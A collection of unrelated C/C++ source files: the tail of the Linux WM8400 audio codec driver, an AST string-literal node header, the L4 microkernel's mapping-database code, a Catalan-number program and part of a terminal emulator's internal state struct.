VMID at 2x50k */ val = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1); val |= 0x2 | WM8400_VREF_ENA; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val); /* Enable BUFIOEN */ snd_soc_write(codec, 
WM8400_ANTIPOP2, WM8400_SOFTST | WM8400_BUFDCOPEN | WM8400_POBCTRL | WM8400_BUFIOEN); /* disable POBCTRL, SOFT_ST and BUFDCOPEN */ snd_soc_write(codec, WM8400_ANTIPOP2, WM8400_BUFIOEN); } /* VMID=2*300k */ val = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1) & ~WM8400_VMID_MODE_MASK; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val | 0x4); break; case SND_SOC_BIAS_OFF: /* Enable POBCTRL and SOFT_ST */ snd_soc_write(codec, WM8400_ANTIPOP2, WM8400_SOFTST | WM8400_POBCTRL | WM8400_BUFIOEN); /* Enable POBCTRL, SOFT_ST and BUFDCOPEN */ snd_soc_write(codec, WM8400_ANTIPOP2, WM8400_SOFTST | WM8400_BUFDCOPEN | WM8400_POBCTRL | WM8400_BUFIOEN); /* mute DAC */ val = snd_soc_read(codec, WM8400_DAC_CTRL); snd_soc_write(codec, WM8400_DAC_CTRL, val | WM8400_DAC_MUTE); /* Enable any disabled outputs */ val = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1); val |= WM8400_SPK_ENA | WM8400_OUT3_ENA | WM8400_OUT4_ENA | WM8400_LOUT_ENA | WM8400_ROUT_ENA; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val); /* Disable VMID */ val &= ~WM8400_VMID_MODE_MASK; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val); msleep(300); /* Enable all output discharge bits */ snd_soc_write(codec, WM8400_ANTIPOP1, WM8400_DIS_LLINE | WM8400_DIS_RLINE | WM8400_DIS_OUT3 | WM8400_DIS_OUT4 | WM8400_DIS_LOUT | WM8400_DIS_ROUT); /* Disable VREF */ val &= ~WM8400_VREF_ENA; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val); /* disable POBCTRL, SOFT_ST and BUFDCOPEN */ snd_soc_write(codec, WM8400_ANTIPOP2, 0x0); ret = regulator_bulk_disable(ARRAY_SIZE(power), &power[0]); if (ret != 0) return ret; break; } codec->dapm.bias_level = level; return 0; } #define WM8400_RATES SNDRV_PCM_RATE_8000_96000 #define WM8400_FORMATS (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S20_3LE |\ SNDRV_PCM_FMTBIT_S24_LE) static const struct snd_soc_dai_ops wm8400_dai_ops = { .hw_params = wm8400_hw_params, .digital_mute = wm8400_mute, .set_fmt = wm8400_set_dai_fmt, .set_clkdiv = wm8400_set_dai_clkdiv, .set_sysclk = 
wm8400_set_dai_sysclk, .set_pll = wm8400_set_dai_pll, }; /* * The WM8400 supports 2 different and mutually exclusive DAI * configurations. * * 1. ADC/DAC on Primary Interface * 2. ADC on Primary Interface/DAC on secondary */ static struct snd_soc_dai_driver wm8400_dai = { /* ADC/DAC on primary */ .name = "wm8400-hifi", .playback = { .stream_name = "Playback", .channels_min = 1, .channels_max = 2, .rates = WM8400_RATES, .formats = WM8400_FORMATS, }, .capture = { .stream_name = "Capture", .channels_min = 1, .channels_max = 2, .rates = WM8400_RATES, .formats = WM8400_FORMATS, }, .ops = &wm8400_dai_ops, }; static int wm8400_suspend(struct snd_soc_codec *codec) { wm8400_set_bias_level(codec, SND_SOC_BIAS_OFF); return 0; } static int wm8400_resume(struct snd_soc_codec *codec) { wm8400_set_bias_level(codec, SND_SOC_BIAS_STANDBY); return 0; } static void wm8400_probe_deferred(struct work_struct *work) { struct wm8400_priv *priv = container_of(work, struct wm8400_priv, work); struct snd_soc_codec *codec = priv->codec; /* charge output caps */ wm8400_set_bias_level(codec, SND_SOC_BIAS_STANDBY); } static int wm8400_codec_probe(struct snd_soc_codec *codec) { struct wm8400 *wm8400 = dev_get_platdata(codec->dev); struct wm8400_priv *priv; int ret; u16 reg; priv = devm_kzalloc(codec->dev, sizeof(struct wm8400_priv), GFP_KERNEL); if (priv == NULL) return -ENOMEM; snd_soc_codec_set_drvdata(codec, priv); priv->wm8400 = wm8400; priv->codec = codec; ret = devm_regulator_bulk_get(wm8400->dev, ARRAY_SIZE(power), &power[0]); if (ret != 0) { dev_err(codec->dev, "Failed to get regulators: %d\n", ret); return ret; } INIT_WORK(&priv->work, wm8400_probe_deferred); wm8400_codec_reset(codec); reg = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1); snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, reg | WM8400_CODEC_ENA); /* Latch volume update bits */ reg = snd_soc_read(codec, WM8400_LEFT_LINE_INPUT_1_2_VOLUME); snd_soc_write(codec, WM8400_LEFT_LINE_INPUT_1_2_VOLUME, reg & WM8400_IPVU); reg = 
snd_soc_read(codec, WM8400_RIGHT_LINE_INPUT_1_2_VOLUME); snd_soc_write(codec, WM8400_RIGHT_LINE_INPUT_1_2_VOLUME, reg & WM8400_IPVU); snd_soc_write(codec, WM8400_LEFT_OUTPUT_VOLUME, 0x50 | (1<<8)); snd_soc_write(codec, WM8400_RIGHT_OUTPUT_VOLUME, 0x50 | (1<<8)); if (!schedule_work(&priv->work)) return -EINVAL; return 0; } static int wm8400_codec_remove(struct snd_soc_codec *codec) { u16 reg; reg = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1); snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, reg & (~WM8400_CODEC_ENA)); return 0; } static struct regmap *wm8400_get_regmap(struct device *dev) { struct wm8400 *wm8400 = dev_get_platdata(dev); return wm8400->regmap; } static struct snd_soc_codec_driver soc_codec_dev_wm8400 = { .probe = wm8400_codec_probe, .remove = wm8400_codec_remove, .suspend = wm8400_suspend, .resume = wm8400_resume, .get_regmap = wm8400_get_regmap, .set_bias_level = wm8400_set_bias_level, .controls = wm8400_snd_controls, .num_controls = ARRAY_SIZE(wm8400_snd_controls), .dapm_widgets = wm8400_dapm_widgets, .num_dapm_widgets = ARRAY_SIZE(wm8400_dapm_widgets), .dapm_routes = wm8400_dapm_routes, .num_dapm_routes = ARRAY_SIZE(wm8400_dapm_routes), }; static int wm8400_probe(struct platform_device *pdev) { return snd_soc_register_codec(&pdev->dev, &soc_codec_dev_wm8400, &wm8400_dai, 1); } static int wm8400_remove(struct platform_device *pdev) { snd_soc_unregister_codec(&pdev->dev); return 0; } static struct platform_driver wm8400_codec_driver = { .driver = { .name = "wm8400-codec", .owner = THIS_MODULE, }, .probe = wm8400_probe, .remove = wm8400_remove, }; module_platform_driver(wm8400_codec_driver); MODULE_DESCRIPTION("ASoC WM8400 driver"); MODULE_AUTHOR("Mark Brown"); MODULE_LICENSE("GPL"); MODULE_ALIAS("platform:wm8400-codec");
{ "language": "C" }
#ifndef RCC_AST_STRING_LITERAL_NODE_H
#define RCC_AST_STRING_LITERAL_NODE_H

#include <string>
using std::string;

#include "expression_node.h"

// AST expression node holding a string literal's text.
class StringLiteralNode : public ExpressionNode {
public:
	// Construct from the literal's text.
	// NOTE(review): presumably the text is already unescaped by the
	// lexer -- confirm against the caller.
	StringLiteralNode(string literal);

	// Read-only accessor for the stored literal text.
	const string literal() const;

private:
	string _literal;  // the literal's text
};

#endif
{ "language": "C" }
/********************************************************************* * * Copyright (C) 2000-2006, 2010, Karlsruhe University * * File path: generic/mapping.cc * Description: Generic mapping database implementation * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: mapping.cc,v 1.27 2006/10/07 16:34:09 ud3 Exp $ * ********************************************************************/ #include <debug.h> #include <mapping.h> #include <linear_ptab.h> #include <sync.h> #include INC_API(tcb.h) spinlock_t mdb_lock; word_t mdb_pgshifts[] = MDB_PGSHIFTS; // The sigma0_mapnode is initialized to own the whole address space. 
// Statically allocated root of the whole mapping tree (sigma0's node).
static mapnode_t __sigma0_mapnode;
mapnode_t * sigma0_mapnode;

static rootnode_t * mdb_create_roots (mapnode_t::pgsize_e size) NOINLINE;
static dualnode_t * mdb_create_dual (mapnode_t * map, rootnode_t * root) NOINLINE;


/**
 * Initialize mapping database structures
 */
void SECTION (".init") init_mdb (void)
{
    dualnode_t *dual;
    void mdb_buflist_init (void);

    mdb_buflist_init ();
    mdb_lock.lock();

    // Frame table for the complete address space.
    dual = mdb_create_dual (NULL, mdb_create_roots (mapnode_t::size_max));

    // Let sigma0 own the whole address space.
    sigma0_mapnode = &__sigma0_mapnode;
    sigma0_mapnode->set_backlink ((mapnode_t *) NULL, (pgent_t *) NULL);
    sigma0_mapnode->set_space ((space_t *) 0);
    sigma0_mapnode->set_depth (0);
    sigma0_mapnode->set_next (dual);

    pgent_t::pgsize_e i;
    mapnode_t::pgsize_e j;

    // Sanity checking of pgshift arrays: every valid hardware page size
    // must have a corresponding mapping-database page size.
    for (i = (pgent_t::pgsize_e) 0; i < pgent_t::size_max; i++)
    {
        if (! is_page_size_valid (i))
            continue;
        for (j = (mapnode_t::pgsize_e) 0; j < mapnode_t::size_max; j++)
            if (hw_pgshifts[i] == mdb_pgshifts[j])
                break;
        if (j == mapnode_t::size_max)
            panic ("mdb_pgshifts[] is not a superset of valid hw_pgshifts[]");
    }

    mdb_lock.unlock();
}


/*
 * Helper functions
 */

// Number of entries in a root array at the given mapping-db page size.
INLINE word_t mdb_arraysize (mapnode_t::pgsize_e pgsize)
{
    return 1 << (mdb_pgshifts[pgsize+1] - mdb_pgshifts[pgsize]);
}

// Index of ADDR within a root array at the given mapping-db page size.
INLINE word_t mdb_get_index (mapnode_t::pgsize_e size, addr_t addr)
{
    return ((word_t) addr >> mdb_pgshifts[size]) & (mdb_arraysize(size) - 1);
}

// Root node in array R that covers address ADDR.
INLINE rootnode_t * mdb_index_root (mapnode_t::pgsize_e size,
                                    rootnode_t * r, addr_t addr)
{
    return r + mdb_get_index (size, addr);
}

// Smallest mapping-db page size that covers the given hardware page size.
INLINE mapnode_t::pgsize_e mdb_pgsize (pgent_t::pgsize_e hw_pgsize)
{
    mapnode_t::pgsize_e s = (mapnode_t::pgsize_e) 0;
    while (mdb_pgshifts[s] < hw_pgshifts[hw_pgsize])
        s++;
    return s;
}

// Smallest hardware page size that covers the given mapping-db page size.
INLINE pgent_t::pgsize_e hw_pgsize (mapnode_t::pgsize_e mdb_pgsize)
{
    pgent_t::pgsize_e s = (pgent_t::pgsize_e) 0;
    while (hw_pgshifts[s] < mdb_pgshifts[mdb_pgsize])
        s++;
    return s;
}

// Unlink mapping node CMAP, whose predecessor is the mapping node PMAP,
// from the list and free it.  A dual node that becomes redundant (no
// mappings left, only a root pointer) is freed as well.
static void remove_map (mapnode_t * pmap, mapnode_t * cmap)
{
    mapnode_t * nmap = cmap->get_nextmap ();

    if (pmap->is_next_map ())
        pmap->set_next (nmap);
    else
    {
        dualnode_t * dual = pmap->get_nextdual ();
        if (nmap)
            dual->map = nmap;
        else
        {
            // No more mappings, remove dual node
            pmap->set_next (dual->root);
            mdb_free_buffer ((addr_t) dual, sizeof (dualnode_t));
        }
    }

    mdb_free_buffer ((addr_t) cmap, sizeof (mapnode_t));

    if (nmap)
        nmap->set_backlink (pmap, nmap->get_pgent (cmap));
}

// Overload: unlink mapping node CMAP whose predecessor is root node PROOT.
static void NOINLINE remove_map (rootnode_t * proot, mapnode_t * cmap)
{
    mapnode_t * nmap = cmap->get_nextmap ();

    if (proot->is_next_map ())
        proot->set_ptr (nmap);
    else
    {
        dualnode_t * dual = proot->get_dual ();
        if (nmap)
            dual->map = nmap;
        else
        {
            // No more mappings, remove dual node
            proot->set_ptr (dual->root);
            mdb_free_buffer ((addr_t) dual, sizeof (dualnode_t));
        }
    }

    mdb_free_buffer ((addr_t) cmap, sizeof (mapnode_t));

    if (nmap)
        nmap->set_backlink (proot, nmap->get_pgent (cmap));
}


/**
 * Inserts mapping into mapping database
 *
 * @param f_map		node to map from
 * @param f_pg		page table entry of source mapping
 * @param f_hwpgsize	page size of source mapping
 * @param f_addr	virtual address of source mapping
 * @param t_pg		page table entry for destination mapping
 * @param t_hwpgsize	page size of destination mapping
 * @param t_space	space of destination mapping
 * @param grant		grant or map
 *
 * @returns mapping node of the destination mapping
 */
mapnode_t * mdb_map (mapnode_t * f_map, pgent_t * f_pg,
                     pgent_t::pgsize_e f_hwpgsize, addr_t f_addr,
                     pgent_t * t_pg, pgent_t::pgsize_e t_hwpgsize,
                     space_t * t_space, bool grant)
{
    rootnode_t *root, *proot;
    mapnode_t *nmap;

    //space_t::begin_update();
    mdb_lock.lock();

    // Grant operations simply reuse the old mapping node: only the
    // backlink's page table entry and the owning space change.
    if (grant)
    {
        if (f_map->is_prev_root ())
            f_map->set_backlink (f_map->get_prevroot (f_pg), t_pg);
        else
            f_map->set_backlink (f_map->get_prevmap (f_pg), t_pg);
        f_map->set_space (t_space);
        mdb_lock.unlock();
        //space_t::end_update();
        return f_map;
    }

    // Convert to mapping database pagesizes
    mapnode_t::pgsize_e f_pgsize = mdb_pgsize (f_hwpgsize);
    mapnode_t::pgsize_e t_pgsize = mdb_pgsize (t_hwpgsize);

    mapnode_t * newmap = (mapnode_t *) mdb_alloc_buffer (sizeof (mapnode_t));

    if (f_pgsize == t_pgsize)
    {
        // Hook new node directly below mapping node
        nmap = f_map->get_nextmap ();
        newmap->set_backlink (f_map, t_pg);
        newmap->set_space (t_space);
        newmap->set_depth (f_map->get_depth () + 1);
        newmap->set_next (nmap);

        // Fixup prev->next pointer
        if (f_map->is_next_root ())
            f_map->set_next (mdb_create_dual (newmap, f_map->get_nextroot ()));
        else if (f_map->is_next_both ())
            f_map->get_nextdual ()->map = newmap;
        else
            f_map->set_next (newmap);

        // Fixup next->prev pointer
        if (nmap)
            nmap->set_backlink (newmap, nmap->get_pgent (f_map));

        mdb_lock.unlock();
        //space_t::end_update();
        return newmap;
    }

    root = NULL;

    // Destination page is smaller than source: descend through root
    // arrays, creating them on demand, until the sizes match.
    while (f_pgsize > t_pgsize)
    {
        // Need to traverse into subtrees
        f_pgsize--;
        proot = root;

        if (proot)
        {
            nmap = proot->get_map ();
            root = proot->get_root ();
        }
        else
        {
            // This is for 1st iteration only
            nmap = f_map->get_nextmap ();
            root = f_map->get_nextroot ();
        }

        if (! root)
        {
            // New array needs to be created
            root = mdb_create_roots (f_pgsize);
            if (proot)
                // Insert below previous root node
                if (nmap)
                    proot->set_ptr (mdb_create_dual (nmap, root));
                else
                    proot->set_ptr (root);
            else
                // Insert below original mapping node
                if (nmap)
                    f_map->set_next (mdb_create_dual (nmap, root));
                else
                    f_map->set_next (root);
        }

        // Traverse into subtree
        root = mdb_index_root (f_pgsize, root, f_addr);
    }

    // Insert mapping below root node
    nmap = root->get_map ();
    newmap->set_backlink (root, t_pg);
    newmap->set_space (t_space);
    newmap->set_depth (f_map->get_depth () + 1);
    newmap->set_next (root->get_map ());

//    printf ("newmap=%p prev=%p:%p space=%p depth=%p next=%p:%p:%p\n",
//	    newmap, newmap->get_prevmap(t_pg), newmap->get_prevroot(t_pg),
//	    newmap->get_space(), newmap->get_depth(),
//	    newmap->get_nextmap(), newmap->get_nextroot(),
//	    newmap->get_nextdual());

    // Fixup root->next pointer
    if (root->is_next_root ())
        root->set_ptr (mdb_create_dual (newmap, root->get_root ()));
    else if (root->is_next_both ())
        root->get_dual ()->map = newmap;
    else
        root->set_ptr (newmap);

    // Fixup next->prev pointer
    if (nmap)
        nmap->set_backlink (newmap, nmap->get_pgent (root));

    mdb_lock.unlock();
    //space_t::end_update();
    return newmap;
}


/**
 * Flush mapping recursively from mapping database
 *
 * @param f_map		node to flush from
 * @param f_pg		page table entry of source mapping
 * @param f_hwpgsize	page size of source mapping
 * @param f_addr	virtual address of source mapping
 * @param t_hwpgsize	page size to flush
 * @param fp		fpage specified to fpage_unmap()
 * @param unmap_self	flush self or just child mapping
 *
 * Recursively revokes access attributes of indicated mapping.  If all
 * access rights are revoked, the mapping will be recursively removed
 * from the mapping database.
 *
 * @returns logical OR of all involved mappings' access attributes
 */
word_t mdb_flush (mapnode_t * f_map, pgent_t * f_pg,
                  pgent_t::pgsize_e f_hwpgsize, addr_t f_addr,
                  pgent_t::pgsize_e t_hwpgsize, fpage_t fp, bool unmap_self)
{
    dualnode_t *dual;
    mapnode_t *pmap, *nmap;
    rootnode_t *root, *proot, *nroot;
    word_t rcnt, startdepth, rwx;
    addr_t vaddr;
    space_t *space, *parent_space;
    pgent_t *parent_pg;
    pgent_t::pgsize_e parent_pgsize;

    // Explicit recursion stack, indexed by mapping-db page size: state
    // saved when descending into a sub-array of root nodes.
    mapnode_t * r_nmap[mapnode_t::size_max];
    rootnode_t * r_root[mapnode_t::size_max];
    word_t r_rcnt[mapnode_t::size_max];
    word_t r_prev[mapnode_t::size_max]; /* Bit 0 set indicates mapping.
					   Bit 0 cleared indicates root. */

    rcnt = 0;
    startdepth = f_map->get_depth ();
    root = NULL;

    if (unmap_self)
    {
	// Read and reset the reference bits stored in the mapping node.
	// These reference bits were updated when someone further up in
	// the mappings tree performed a reference bit read-and-reset
	// (i.e., unmap).  Also clear the reference bits in the page table
	// entry to make sure that the mapping node bits are not modified
	// in the algorithm below.
	space = f_map->get_space ();
	vaddr = f_pg->vaddr (space, f_hwpgsize, f_map);
	rwx = f_map->get_rwx () | f_pg->reference_bits (space, f_hwpgsize,
							vaddr);
	f_map->set_rwx (0);
	f_pg->reset_reference_bits (space, f_hwpgsize);
	parent_pg = NULL;
    }
    else
    {
	// Do not take the reference bits of current mapping into
	// account unless we have a flush operation.  Instead, we
	// record the reference bits for the whole subtree in the
	// current page table entry.
	rwx = 0;
	parent_pg = f_pg;
	parent_space = f_map->get_space ();
	parent_pgsize = f_hwpgsize;
    }

    // Convert to mapping database pagesizes
    mapnode_t::pgsize_e f_pgsize = mdb_pgsize (f_hwpgsize);
    mapnode_t::pgsize_e t_pgsize = mdb_pgsize (t_hwpgsize);

    mdb_lock.lock();

    do {
	// Variables `f_map' and `f_pg' are valid at this point
	dual  = f_map->get_nextdual ();
	nroot = f_map->get_nextroot ();
	nmap  = f_map->get_nextmap ();
	pmap  = f_map->get_prevmap (f_pg);
	proot = f_map->get_prevroot (f_pg);
	space = f_map->get_space ();
	f_hwpgsize = hw_pgsize (f_pgsize);

	// Variable contents at this point:
	//
	//  f_map	- the current mapping node
	//  f_pg	- the current pgent node
	//  pmap	- the previous mapping node (or NULL if prev is root)
	//  proot	- the previous root node (or NULL if prev is map)
	//  nmap	- the next mapping node (may be NULL)
	//  dual	- next dual node (or NULL if no such node)
	//  root	- Current root array pointer (or NULL)

//	printf("New: f_map=%p dual=%p nmap=%p pmap=%p proot=%p "
//	       "fsize=%d tsize=%d root=%p\n",
//	       f_map, dual, nmap, pmap, proot, f_pgsize, t_pgsize, root);

	vaddr = f_pg->vaddr (space, f_hwpgsize, f_map);

	if (unmap_self)
	{
	    // Update reference bits
	    f_map->update_rwx (f_pg->reference_bits (space, f_hwpgsize,
						     vaddr));
	    rwx |= f_pg->reference_bits (space, f_hwpgsize, vaddr);

	    ASSERT (f_pgsize <= t_pgsize);
	    if (fp.is_rwx ())
	    {
		// Revoke all access rights (i.e., remove node)
		if (pmap)
		    remove_map (pmap, f_map);
		else
		    remove_map (proot, f_map);
		f_pg->clear(space, f_hwpgsize, false, vaddr);
	    }
	    else
	    {
		// Revoke access rights
		f_pg->revoke_rights (space, f_hwpgsize, fp.get_rwx ());
		f_pg->reset_reference_bits (space, f_hwpgsize);
		f_pg->flush (space, f_hwpgsize, false, vaddr);
		pmap = f_map;
		proot = NULL;
	    }

	    // We might have to flush some TLB entries
	    if (! space->does_tlbflush_pay (fp.get_size_log2 ()))
		space->flush_tlbent (get_current_space (), vaddr,
				     page_shift (f_hwpgsize));
	}
	else
	{
	    f_pg->reset_reference_bits (space, f_hwpgsize);
	    pmap = f_map;
	    proot = NULL;
	}

	f_map = NULL;

	// Variables `f_map' and `f_pg' are no longer valid here

	if (nroot)
	{
	    f_pgsize--;
	    if (f_pgsize < t_pgsize)
	    {
		// Recurse into subarray before checking mappings
		ASSERT (f_pgsize < mapnode_t::size_max);
		// Tag bit 0 records whether the saved predecessor was a
		// mapping node (set) or a root node (cleared).
		r_prev[f_pgsize] = pmap ? (word_t) pmap | 1 : (word_t) proot;
		r_nmap[f_pgsize] = nmap;
		r_root[f_pgsize] = root;
		r_rcnt[f_pgsize] = rcnt;
		root = nroot - 1;
		rcnt = mdb_arraysize (f_pgsize);
		if (dual && fp.is_rwx () && unmap_self)
		    mdb_free_buffer ((addr_t) dual, sizeof (dualnode_t));
	    }
	    else
	    {
		// We may use the virtual address f_addr for indexing
		// here since the alignment within the page will be
		// the same as with the physical address.
		root = mdb_index_root (f_pgsize, nroot, f_addr) - 1;
		rcnt = 1;
	    }
	}
	else
	{
	    if (nmap)
	    {
		if (pmap)
		    f_pg = nmap->get_pgent (pmap);
		else
		    f_pg = nmap->get_pgent (proot);
		f_map = nmap;
	    }
	    else if ((f_pgsize < t_pgsize) && root)
	    {
		// Recurse up from subarray
		if (fp.is_rwx ())
		{
		    // Revoke all access rights (i.e., remove subtree)
		    root -= mdb_arraysize (f_pgsize) - 1;
		    mdb_free_buffer ((addr_t) root, mdb_arraysize (f_pgsize) *
				     sizeof (rootnode_t));
		}
		ASSERT (f_pgsize < mapnode_t::size_max);
		f_map = r_nmap[f_pgsize];
		root = r_root[f_pgsize];
		rcnt = r_rcnt[f_pgsize];
		if (r_prev[f_pgsize] & 1)
		{
		    // Saved predecessor was a mapping node (strip tag bit).
		    proot = NULL;
		    pmap = (mapnode_t *) (r_prev[f_pgsize] & ~1UL);
		    if (f_map)
			f_pg = f_map->get_pgent (pmap);
		}
		else
		{
		    proot = (rootnode_t *) r_prev[f_pgsize];
		    pmap = NULL;
		    if (f_map)
			f_pg = f_map->get_pgent (proot);
		}
		f_pgsize++;
	    }
	}

	// If f_map now is non-nil, the variables f_map, f_pg, pmap
	// and proot will all be valid.  Otherwise, root and rcnt will
	// be valid.

	while ((! f_map) && (rcnt > 0))
	{
	    rcnt--;
	    root++;
	    dual  = root->get_dual ();
	    nroot = root->get_root ();
	    f_map = root->get_map ();

	    if (nroot)
	    {
		// Recurse into subarray before checking mappings
		f_pgsize--;
		if (fp.is_rwx ())
		    root->set_ptr (f_map);	// Remove subarray
		ASSERT (f_pgsize < mapnode_t::size_max);
		r_prev[f_pgsize] = (word_t) root;
		r_nmap[f_pgsize] = f_map;
		r_root[f_pgsize] = root;
		r_rcnt[f_pgsize] = rcnt;
		f_map = NULL;
		root = nroot - 1;
		rcnt = mdb_arraysize (f_pgsize);
		if (dual && fp.is_rwx ())
		    mdb_free_buffer ((addr_t) dual, sizeof (dualnode_t));
	    }
	    else
	    {
		if (f_map)
		{
		    f_pg = f_map->get_pgent (root);
		    pmap = NULL;
		    proot = root;
		}
	    }
	}

	if (f_pgsize <= t_pgsize)
	    // From now on we will unmap all nodes
	    unmap_self = true;

    } while (f_map && f_map->get_depth () > startdepth);

    // Update the reference bits in the page table entry of the parent
    // mapping.
    // XXX: Handle the case where one does flush instead of unmap.
    if (parent_pg)
	parent_pg->update_reference_bits (parent_space, parent_pgsize, rwx);

    mdb_lock.unlock();
    return rwx;
}


/**
 * Create root array
 *
 * @param size	page size for root nodes
 *
 * Allocates and initializes a new root array.
 *
 * @returns pointer to array
 */
static NOINLINE rootnode_t * mdb_create_roots (mapnode_t::pgsize_e size)
{
    rootnode_t *newnodes, *n;
    word_t num = mdb_arraysize (size);

    newnodes = (rootnode_t *) mdb_alloc_buffer (sizeof (rootnode_t) * num);

    // All entries start out empty (NULL map pointer).
    for (n = newnodes; num--; n++)
	n->set_ptr ((mapnode_t *) NULL);

    return newnodes;
}

/**
 * Create a dual node
 *
 * @param map	map pointer of node
 * @param root	root pointer of node
 *
 * Allocates and initializes a new dual node.
 *
 * @returns pointer to dual node
 */
static NOINLINE dualnode_t * mdb_create_dual (mapnode_t * map,
					      rootnode_t * root)
{
    dualnode_t * dual = (dualnode_t *) mdb_alloc_buffer (sizeof (dualnode_t));
    dual->map = map;
    dual->root = root;
    return dual;
}
{ "language": "C" }
/*
Catalan numbers (Cn) are a sequence of natural numbers that occur in
many places.  The most important ones being that Cn gives the number of
Binary Search Trees possible with n values.  Cn is the number of full
Binary Trees with n + 1 leaves.  Cn is the number of different ways
n + 1 factors can be completely parenthesized.
*/
#include <stdio.h>
#include <string.h>

typedef long long int ll;

/* Largest valid 1-indexed input: the result for n = 36 is C(35), the
 * last Catalan number that fits in a signed 64-bit integer.  Larger n
 * would silently overflow (undefined behavior for signed types). */
#define MAX_CATALAN_N 36

/*
 * Returns the nth Catalan number, 1-indexed (n = 1 -> C(0) = 1).
 *
 * Catalan numbers satisfy the recurrence
 *     C(i) = sum over j in [0, i) of C(j) * C(i - j - 1)
 * e.g. C(5) = C0*C4 + C1*C3 + C2*C2 + C3*C1 + C4*C0.
 * The table is filled bottom-up (dynamic programming), so every value
 * is computed exactly once.
 *
 * Precondition: 1 <= n <= MAX_CATALAN_N (validated by the caller).
 */
static ll nth_catalan(ll n)
{
    /* Catalan[i] holds C(i); fixed size replaces the original VLA that
     * was sized by unvalidated user input. */
    ll Catalan[MAX_CATALAN_N];
    memset(Catalan, 0, sizeof(Catalan));

    /* Base case; C(1) = C(0)*C(0) = 1 falls out of the loop below. */
    Catalan[0] = 1;

    for (ll i = 1; i < n; i++)
        for (ll j = 0; j < i; j++)
            Catalan[i] += Catalan[j] * Catalan[i - j - 1];

    /* The nth Catalan number (1-indexed) is at index n - 1. */
    return Catalan[n - 1];
}

int main()
{
    /* n denotes the nth Catalan Number that we want to compute. */
    ll n;

    /* Validate the input.  The original code sized a VLA from an
     * unchecked scanf() value: n = 0 wrote out of bounds, negative n
     * was undefined behavior, and n > 36 overflowed long long. */
    if (scanf("%lld", &n) != 1 || n < 1 || n > MAX_CATALAN_N) {
        fprintf(stderr, "n must be an integer in [1, %d]\n", MAX_CATALAN_N);
        return 1;
    }

    printf("The Catalan Number (Cn) is: %lld", nth_catalan(n));
    return 0;
}
/*
Input: 10
Output: The Catalan Number (Cn) is: 4862

Input: 5
Output: The Catalan Number (Cn) is: 14
*/
{ "language": "C" }
#ifndef _TERMIOINTERNALS_H__
#define _TERMIOINTERNALS_H__ 1
/* NOTE(review): the guard name starts with '_' + uppercase, which is
 * reserved for the implementation; renaming would touch other files,
 * so it is only flagged here. */

/* The fuzz/test binaries do not link the real Term type. */
#if defined(BINARY_TYFUZZ) || defined(BINARY_TYTEST)
typedef void Term;
#endif

typedef struct _Termio Termio;

/* Internal state of the terminal-grid smart object.  Field-group
 * comments below are inferred from names -- confirm against termio.c. */
struct _Termio
{
   Evas_Object_Smart_Clipped_Data __clipped_data; /* clipped smart-object
                                                   * boilerplate */
   struct {                     /* current font metrics */
      const char *name;
      int size;
      int chw, chh;             /* character cell width/height */
   } font;
   struct {                     /* character grid */
      int w, h;
      Evas_Object *obj;
   } grid;
   struct {                     /* selection display objects */
      Evas_Object *top, *bottom, *theme;
   } sel;
   struct {                     /* text cursor */
      Evas_Object *obj;
      int x, y;
      Cursor_Shape shape;
   } cursor;
   struct {                     /* last mouse cell position / button */
      int cx, cy;
      int button;
   } mouse;
   struct {                     /* link (or color) under the pointer */
      const char *string;
      int x1, y1, x2, y2;       /* cell rectangle spanned by the link */
      Eina_Bool is_color;
      int suspend;
      uint16_t id;
      Eina_List *objs;
      struct {
         uint8_t r;
         uint8_t g;
         uint8_t b;
         uint8_t a;
      } color;
      struct {                  /* press / drag-and-drop bookkeeping */
         Evas_Object *dndobj;
         Evas_Coord x, y;
         unsigned char down : 1;
         unsigned char dnd : 1;
         unsigned char dndobjdel : 1;
      } down;
   } link;
   struct {                     /* in-progress file transfer state */
      const char *file;
      FILE *f;
      double progress;
      unsigned long long total, size;
      Eina_Bool active : 1;
   } sendfile;
   struct {
      int r;
      int g;
      int b;
      int a;
   } saved_bg, saved_fg;        /* saved colors for later restore */
   Evas_Object *ctxpopup;
   int zoom_fontsize_start;
   int scroll;                  /* scrollback position -- TODO confirm units */
   Evas_Object *self;
   Evas_Object *event;
   Term *term;
   Termpty *pty;
   Ecore_Animator *anim;
   Ecore_Timer *delayed_size_timer;
   Ecore_Timer *link_do_timer;
   Ecore_Timer *mouse_selection_scroll_timer;
   Ecore_Job *mouse_move_job;
   Ecore_Timer *mouseover_delay;
   Evas_Object *win, *theme, *glayer;
   Config *config;
